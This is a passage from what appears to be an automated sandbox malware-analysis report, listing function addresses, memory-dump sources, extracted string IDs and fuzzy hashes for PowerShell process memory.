                                                                                                      • Instruction Fuzzy Hash: 52E01A31B4C8089FDAA8DB0CE0409AD77E1FB9837172102B7D14EC7567CA22EC51CB90

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FF887D002AD Relevance: 6.5, Strings: 5, Instructions: 215COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: dA$@J_$]$p@s$x._
                                                                                                      • API String ID: 0-76705859
                                                                                                      • Opcode ID: e21fcbd1cb9628866adf2999e332cff973f84b821b3eb630bf89769ccd87ef6d
                                                                                                      • Instruction ID: a170c0f3298134ceb47e62ea3390c760566a5c2199eedba0d7030407f3fd77c4
                                                                                                      • Opcode Fuzzy Hash: e21fcbd1cb9628866adf2999e332cff973f84b821b3eb630bf89769ccd87ef6d
                                                                                                      • Instruction Fuzzy Hash: CB61F252C8EAC16FF21746B8381417D6EB0FF52A90B9841FBC09D8B0DFE849AD59C346
                                                                                                      Function 00007FF887D08BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000A.00000002.1712994023.00007FF887D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_10_2_7ff887d00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: O_^4$O_^7$O_^F$O_^J
                                                                                                      • API String ID: 0-875994666
                                                                                                      • Opcode ID: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
                                                                                                      • Instruction ID: 8a02a64b9c8484de9747972bc78f4952c54ec0a8a618b9d31cc382a58a81af1e
                                                                                                      • Opcode Fuzzy Hash: fc36652a01fde3d68541ef6407f4994e1d7447276bdf42ee148701f13201db76
                                                                                                      • Instruction Fuzzy Hash: 7E210777A18125CED2417BBDB8046DD3740CFD627634542B2D1AE8F243EA18748786A1

                                                                                                      Executed Functions

                                                                                                      Function 00007FF887E06660 Relevance: 1.6, Strings: 1, Instructions: 392COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931052169.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: X7=Y
                                                                                                      • API String ID: 0-1988537002
                                                                                                      • Opcode ID: d3ed4d12b8fd54793e6ce3e89f1de95a9214bd151e62d24ccc070b7b09926864
                                                                                                      • Instruction ID: 03af6bcc063c3173583dbf45874a137dc1bcbb6bca3e601f5bb6d4f255604e23
                                                                                                      • Opcode Fuzzy Hash: d3ed4d12b8fd54793e6ce3e89f1de95a9214bd151e62d24ccc070b7b09926864
                                                                                                      • Instruction Fuzzy Hash: 20C10231D4DA8A8FE764EF6898196BD7BE1FF56B94B0801BED40DCB093DA1CA805C351
                                                                                                      Function 00007FF887E04370 Relevance: .1, Instructions: 149COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931052169.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 485288a6cc4eae241c14e51c3cfda6dc307b54d16a3d0b2a06fae65bb68936fd
                                                                                                      • Instruction ID: 61107392608efa55f3f13ded906bc038cf26b0e2e1afd295e5a568c6d51654e4
                                                                                                      • Opcode Fuzzy Hash: 485288a6cc4eae241c14e51c3cfda6dc307b54d16a3d0b2a06fae65bb68936fd
                                                                                                      • Instruction Fuzzy Hash: 8E412B32E4CA8A4FE7A5D66CA4516BC77E1FF47BA0B0811BAC05DC7587EA1CAC15C381
                                                                                                      Function 00007FF887D39780 Relevance: .1, Instructions: 128COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D35000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d35000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e1d005c54f4c195854b00913de905d9e5777987fbdf2fb0e2102d61a85094050
                                                                                                      • Instruction ID: 6b50cb15bd92b8344bac501713a10156bad32c89b427764cf409a30ced5b46c3
                                                                                                      • Opcode Fuzzy Hash: e1d005c54f4c195854b00913de905d9e5777987fbdf2fb0e2102d61a85094050
                                                                                                      • Instruction Fuzzy Hash: FA31E97191CB884FEB18DF5C9C066A97BF0FBA5311F00426FE449D3292DA70A855CBC2
                                                                                                      Function 00007FF887C1EF00 Relevance: .1, Instructions: 126COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1928535202.00007FF887C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C1D000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887c1d000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9d6aee4d0b45cfba059ab33bb43af445d1f472a468246ffaaae9d14d71ab5d85
                                                                                                      • Instruction ID: 4f462bc28425aba8ab2a173c217c8855f3cefd74e74232831b5e585813a75f94
                                                                                                      • Opcode Fuzzy Hash: 9d6aee4d0b45cfba059ab33bb43af445d1f472a468246ffaaae9d14d71ab5d85
                                                                                                      • Instruction Fuzzy Hash: CA41227080DBC45FE7568B38D845A523FF1EF57260B0901EFD488CB1A3D629A84AC7A2
                                                                                                      Function 00007FF887D3A63C Relevance: .1, Instructions: 120COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D35000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d35000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3feef2b1fd4b909a6bebf6242baf9645022908825a80d8f9ea13acfc67a1578e
                                                                                                      • Instruction ID: 4ec79f323a1794536f889264b194f5cbc010226ae1fbc5154efee7e2213218c1
                                                                                                      • Opcode Fuzzy Hash: 3feef2b1fd4b909a6bebf6242baf9645022908825a80d8f9ea13acfc67a1578e
                                                                                                      • Instruction Fuzzy Hash: 4A31083190CB8C4FEB59DBA89C496E97FF0EBA6320F0441AFD049C7193E664584ACB52
                                                                                                      Function 00007FF887E043BC Relevance: .1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931052169.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ca01d15569361e26dd4839136191a736590c68b67d0068b21ac74de5f863d01a
                                                                                                      • Instruction ID: dfeb644823665824326beab636b342a23a5e13c5177433d9a9eefab6836888bd
                                                                                                      • Opcode Fuzzy Hash: ca01d15569361e26dd4839136191a736590c68b67d0068b21ac74de5f863d01a
                                                                                                      • Instruction Fuzzy Hash: 5F11E332D4D6864FE3A5EA6895505BC76E1FF43AA1B5910BAD01DC7497EA1CAC10C341
                                                                                                      Function 00007FF887D333B5 Relevance: .0, Instructions: 49COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction ID: 00939e82c87dace164199d7fdabe4939007464bef50cb10c5f43c6540cefc411
                                                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                      • Instruction Fuzzy Hash: 7501A73110CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3655DA36E882CB42
                                                                                                      Function 00007FF887D3A0FB Relevance: .0, Instructions: 43COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D35000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d35000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b84cd44cf7333970cdd21c3d6f7d8ed66000295c49c84f6196fa4e2974771ca6
                                                                                                      • Instruction ID: 03633fbc2feaf75581047f06da4ffe45a14394a27ed9087609dfea7da7ee0d99
                                                                                                      • Opcode Fuzzy Hash: b84cd44cf7333970cdd21c3d6f7d8ed66000295c49c84f6196fa4e2974771ca6
                                                                                                      • Instruction Fuzzy Hash: 8EF0FC76689E894FD742DB1CDC550E87FB0FFA6241B0801ABE049C71A2FB219808C7D1
                                                                                                      Function 00007FF887E04143 Relevance: .0, Instructions: 42COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931052169.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d7d84ea19eb2ab7f37d6d0dc5e767be04d12d24bfcaa30f1da57739c181f02a7
                                                                                                      • Instruction ID: b47ce9d8cac8afa31e2310efe941b529483b8dca094dca90c4fa0b1faeb78c63
                                                                                                      • Opcode Fuzzy Hash: d7d84ea19eb2ab7f37d6d0dc5e767be04d12d24bfcaa30f1da57739c181f02a7
                                                                                                      • Instruction Fuzzy Hash: D7F02232A0C5858FE355EA5CE9404A877F0FF5676072500FAD05CC7063CA39AC51C740
                                                                                                      Function 00007FF887E041D1 Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931052169.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887e00000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction ID: 389eef69e47aaf2397c4d42e4ea33376506c8ba95024dfde57af40aadd18df55
                                                                                                      • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                      • Instruction Fuzzy Hash: 89E01A31B4C8099FDA68DA0CE1409AD73E1FB9A36176101BBD14EC7962CA26EC51CB80

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FF887D38BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D35000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D35000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d35000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                                                      • API String ID: 0-1415242001
                                                                                                      • Opcode ID: 376fa47dd52ce803f5d748140fcaab1eb293776c348edebb478c5cdf911be059
                                                                                                      • Instruction ID: 1a1c60fc0dce112cb5376a3b506576867e2fd9fb33b3f251d3f876ce1ae02fc9
                                                                                                      • Opcode Fuzzy Hash: 376fa47dd52ce803f5d748140fcaab1eb293776c348edebb478c5cdf911be059
                                                                                                      • Instruction Fuzzy Hash: A721D773A045158AC24136ADB8416ED7780DF563B834591F3E229CF513DF28A88B8AA1
                                                                                                      Function 00007FF887D3089D Relevance: 8.9, Strings: 7, Instructions: 196COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (0_$8,_$H1_$P/_$xFs$-_$/_
                                                                                                      • API String ID: 0-1052977982
                                                                                                      • Opcode ID: e1754a6bdc57620878b0fc4d7d50dcdfb79816f3b1d2d9cd921aba9a354ad841
                                                                                                      • Instruction ID: c056147ee74d41996ca604b26b498a6a2c6448ce6b238c1a85c1e04eecab0eea
                                                                                                      • Opcode Fuzzy Hash: e1754a6bdc57620878b0fc4d7d50dcdfb79816f3b1d2d9cd921aba9a354ad841
                                                                                                      • Instruction Fuzzy Hash: F261C852D4E9C39FF35646B81C1617DAFB2BF12650B4C42BBC0A9470DBFA099D19C391
                                                                                                      Function 00007FF887D302AD Relevance: 6.5, Strings: 5, Instructions: 223COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929868669.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_7ff887d30000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: dA$@J_$]$p@s$x._
                                                                                                      • API String ID: 0-76705859
                                                                                                      • Opcode ID: a62cf580675e2175cf5ede6b314d42ce2de68a05b61b12053b4d32f6138b201c
                                                                                                      • Instruction ID: 18b59771d1fa254d35d1a4fcf8c45af8c75b32cd411e5f21e8e832f6ef89831f
                                                                                                      • Opcode Fuzzy Hash: a62cf580675e2175cf5ede6b314d42ce2de68a05b61b12053b4d32f6138b201c
                                                                                                      • Instruction Fuzzy Hash: 0271F562D4EAC24FF35646AC28191BC7E72BF12680B9841FBC0994B1DFF949DD19C341